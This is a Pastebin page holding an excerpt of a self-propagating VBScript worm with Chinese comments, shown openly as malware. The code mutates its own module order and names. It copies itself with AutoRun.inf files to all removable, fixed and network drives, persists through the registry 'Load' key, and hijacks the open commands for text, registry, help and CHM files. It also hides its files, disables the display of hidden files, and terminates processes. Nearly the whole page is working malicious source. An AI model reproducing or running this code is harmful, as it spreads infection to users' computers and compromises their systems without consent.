  576.                     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  577.                     Call MonitorSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  578.             End Select
  579.         Else
  580.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  581.             MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  582.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V '生成病毒体完整代码
  583.            VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode) '改变模块组合顺序
  584.            VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names) '改变模块标志名称
  585.            Call MonitorSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  586.         End If
  587.     End Select
  588.     Set objfso = Nothing
  589.     Set objshell = Nothing
  590. End Sub
  591. 'WQKAULMNKKG1_3
  592. 'HJLMRRQRWYOZX1_1
  593. On Error Resume Next
  594. Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V
  595. Dim ModelHead, ModelTail
  596. Cnt = 0
  597. CntMax = 1000
  598. Version = "4"
  599. Name_V1 = GetUserName() & ".vbs"
  600. FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向
  601. FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令
  602. FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
  603. Sum_ModelCode = 26
  604. Head_V= GetHeadTail(0)
  605. Tail_V= GetHeadTail(1)
  606. ModelHead="'HJLMRRQRWYOZX"
  607. ModelTail="'WQKAULMNKKG"
  608. Call <span class="searchlite">Virus</span>Main()
  609. Sub <span class="searchlite">Virus</span>Main()
  610.     On Error Resume Next
  611.     Call ExeVbs_<span class="searchlite">Virus</span>()
  612. End Sub
  613. 'WQKAULMNKKG1_1
  614. 'HJLMRRQRWYOZX2_19
  615. Function GetVersion(objfso, path_v)
  616.     Dim FV, buffer
  617.     Set FV = objfso.OpenTextFile(path_v, 1)
  618.     buffer = FV.ReadAll()
  619.     GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1)
  620. End Function
  621. Function GetScriptCode(Languages)
  622.     On Error Resume Next
  623.     Dim soj
  624.     For Each soj In document.Scripts
  625.         If LCase(soj.Language) = Languages Then
  626.             Select Case LCase(soj.Language)
  627.                 Case "vbscript"
  628.                     GetScriptCode = soj.Text
  629.                     Exit Function
  630.                 Case "javascript"
  631.                     GetScriptCode = soj.Text
  632.                     Exit Function
  633.             End Select
  634.         End If
  635.     Next
  636. End Function
  637. Function GetSelfCode(objfso, FullPath_Self)
  638.     On Error Resume Next
  639.     Dim n, n1, buffer, Self
  640.     Set Self = objfso.OpenTextFile(FullPath_Self, 1)
  641.     buffer = Self.ReadAll
  642.     n = InStr(buffer, Head_V)
  643.     n1 = InstrRev(buffer, Tail_V)
  644.     buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1)
  645.     GetSelfCode = buffer
  646.     Self.Close
  647. End Function
  648. Function GetMainBody(vbsCode, Sum_ModelCode)
  649.     Dim i
  650.     For i = 2 To Sum_ModelCode
  651.         GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF
  652.     Next
  653. End Function
  654. 'WQKAULMNKKG2_19
  655. 'HJLMRRQRWYOZX2_13
  656. Sub DeSafeSet()
  657.     Dim HLMShow , HCUAdvanced, HCUExplorer
  658.     HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
  659.     HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
  660.     HCUExplorer = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
  661.     Call WriteReg (HCUExplorer, 129, "REG_DWORD")
  662.     Call WriteReg (HCUAdvanced, 0, "REG_DWORD")
  663.     Call WriteReg (HLMShow, 0, "REG_DWORD")
  664. End Sub
  665. Sub SafeSet()
  666.     Dim HLMShow , HCUSSHidden, HCUHidden
  667.     Dim HCUExplorer
  668.     HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
  669.     HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
  670.     HCUHidden = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
  671.     Call WriteReg (HCUHidden, 1, "REG_DWORD")
  672.     Call WriteReg (HCUAdvanced, 1, "REG_DWORD")
  673.     Call WriteReg (HLMShow, 1, "REG_DWORD")
  674. End Sub
  675. 'WQKAULMNKKG2_13
  676. 'HJLMRRQRWYOZX2_23
  677. Function MakeScript(strCode, T)
  678.     If T = 1 Then
  679.         MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(strCode, Sum_ModelCode) & VBCRLF & "</" & "SCRIPT>"
  680.     Else
  681.         MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & strCode & VBCRLF & "</" & "SCRIPT>"
  682.     End If
  683. End Function
  684. 'WQKAULMNKKG2_23
  685. 'HJLMRRQRWYOZX1_6
  686. Sub AutoRun(objfso, D, vbsCode)
  687.     On Error Resume Next
  688.     Dim path_autorun, path_vbs, inf_autorun
  689.     path_autorun = D & ":\AutoRun.inf"
  690.     path_vbs = D & ":\" & Name_V1
  691.     If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or GetVersion(objfso, path_vbs)<Version Then
  692.         If objfso.FileExists(path_autorun) = True Then
  693.             objfso.DeleteFile path_autorun, True
  694.         End If
  695.         If objfso.FileExists(path_vbs) = True Then
  696.             objfso.DeleteFile path_vbs, True
  697.         End If
  698.         Call CopyFile(objfso, vbsCode, path_vbs)
  699.         Call SetFileAttr(objfso, path_vbs)
  700.         inf_autorun = "[AutoRun]" & VBCRLF & "Shellexecute=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun=打开(&O)" & VBCRLF & "shell\AutoRun\command=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun1=资源管理器(&X)" & VBCRLF & "shell\AutoRun1\command=WScript.exe " & Name_V1 & " ""AutoRun"""
  701.         Call CopyFile(objfso, inf_autorun, path_autorun)
  702.         Call SetFileAttr(objfso, path_autorun)
  703.     End If
  704. End Sub
  705. 'WQKAULMNKKG1_6
  706. 'HJLMRRQRWYOZX2_14
  707. Function ReadOK(objfso, FullPath_OK)
  708.     On Error Resume Next
  709.     Dim vf, buffer
  710.     Set vf = objfso.OpenTextFile(FullPath_OK, 1)
  711.     buffer = vf.ReadAll
  712.     ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
  713. End Function
  714. Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
  715.     On Error Resume Next
  716.     Dim vf1
  717.     objfso.DeleteFile FullPath_OK, True
  718.     Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
  719.     vf1.Write "OK" & VBCRLF
  720.     vf1.WriteLine Date()
  721.     vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
  722.     Call SetFileAttr(objfso, FullPath_OK)
  723. End Sub
  724. 'WQKAULMNKKG2_14
  725. 'HJLMRRQRWYOZX2_24
  726. Sub KillProcess(ProcessNames)
  727.     On Error Resume Next
  728.     Dim objShell, intReturn, name_exe
  729.     Set objShell = WScript.CreateObject("WScript.Shell")
  730.     strComputer = "."
  731.     Set objWMIServices = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  732.     For Each ProcessName in ProcessNames
  733.         Set colProcessList = objWMIServices.Execquery(" Select * From win32_process where name = '" & ProcessName & "' ")
  734.         For Each objProcess in colProcessList
  735.             intReturn = objProcess.Terminate
  736.             Select Case intReturn
  737.                 Case 2
  738.                     name_exe = objProcess.Name
  739.                     name_exe = Left(name_exe, Len(name_exe) -4)
  740.                     objShell.Run "cmd.exe /c @tskill " & name_exe, 0, False
  741.             End Select
  742.         Next
  743.     Next
  744.     Set objShell = Nothing
  745. End Sub
  746. 'WQKAULMNKKG2_24
  747. 'HJLMRRQRWYOZX1_7
  748. Sub InvadeSystem(objfso, vbsCode)
  749.     On Error Resume Next
  750.     Dim Value, HCULoad, vbsCode_<span class="searchlite">Virus</span>, dc, d
  751.     Value = "%SystemRoot%\System32\WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
  752.     HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
  753.     vbsCode_<span class="searchlite">Virus</span> = vbsCode
  754.     Set dc = objfso.Drives
  755.     For Each d In dc
  756.         If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
  757.             Call AutoRun(objfso, d.DriveLetter, vbsCode_<span class="searchlite">Virus</span>)
  758.         End If
  759.     Next
  760.     If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Version Then
  761.         objfso.DeleteFile FullPath_V1 , True
  762.         Call CopyFile(objfso, vbsCode_<span class="searchlite">Virus</span>, FullPath_V1)
  763.         Call SetFileAttr(objfso, FullPath_V1)
  764.     Else
  765.         Call CopyFile(objfso, vbsCode_<span class="searchlite">Virus</span>, FullPath_V1)
  766.         Call SetFileAttr(objfso, FullPath_V1)
  767.     End If
  768.     If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)<Version Then
  769.         objfso.DeleteFile FullPath_V0 , True
  770.         Call CopyFile(objfso, vbsCode_<span class="searchlite">Virus</span>, FullPath_V0)
  771.         Call SetFileAttr(objfso, FullPath_V0)
  772.     Else
  773.         Call CopyFile(objfso, vbsCode_<span class="searchlite">Virus</span>, FullPath_V0)
  774.         Call SetFileAttr(objfso, FullPath_V0)
  775.     End If
  776.     If ReadReg(HCULoad)<> FullPath_V1 Then
  777.         Call WriteReg (HCULoad, FullPath_V1, "")
  778.     End If
  779.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  780.         Call SetTxtFileAss(FullPath_V0)
  781.     End If
  782.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
  783.         Call SetRegFileAss(FullPath_V0)
  784.     End If
  785.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
  786.         Call SetchmFileAss(FullPath_V0)
  787.     End If
  788.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
  789.         Call SethlpFileAss(FullPath_V0)
  790.     End If
  791.     Call DeSafeSet()
  792. End Sub
  793. 'WQKAULMNKKG1_7
  794. 'HJLMRRQRWYOZX2_15
  795. Sub SetFileAttr(objfso, pathf)
  796.     Dim vf
  797.     Set vf = objfso.GetFile(pathf)
  798.     vf.Attributes = 6
  799. End Sub
  800. 'WQKAULMNKKG2_15
  801. 'HJLMRRQRWYOZX2_18
  802. Function IsOK(objfso, Now_V, path_f)
  803.     On Error Resume Next
  804.     Dim vf, p1, p2, p3
  805.     IsOK = False
  806.     Set vf = objfso.OpenTextFile(path_f, 1)
  807.     p1 = Trim(vf.ReadLine)
  808.     p2 = Trim(vf.ReadLine)
  809.     p3 = Trim(vf.ReadLine)
  810.     If StrComp(p1, "OK", 1) = 0 And StrComp(p2, Now_V, 1) = 0 Then
  811.         IsOK = True
  812.     End If
  813.     If p3 = "Admin" Then
  814.         MsgBox "You Are Admin!!! Your Computer Will Not Be Infected!!!"
  815.         IsOK = True
  816.         n = InputBox("0:退出; 1:监视系统; 2:传染文件", "Super<span class="searchlite">Virus</span>脚本测试!")
  817.         If n = 0 Then
  818.             Wscript.Quit
  819.         ElseIf n = 1 Then
  820.             IsOK = True
  821.         ElseIf n = 2 Then
  822.             IsOK = False
  823.         End If
  824.     End If
  825. End Function
  826. 'WQKAULMNKKG2_18
  827. 'rotartsinimdA
Tags: Terminator vbscript pornography
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!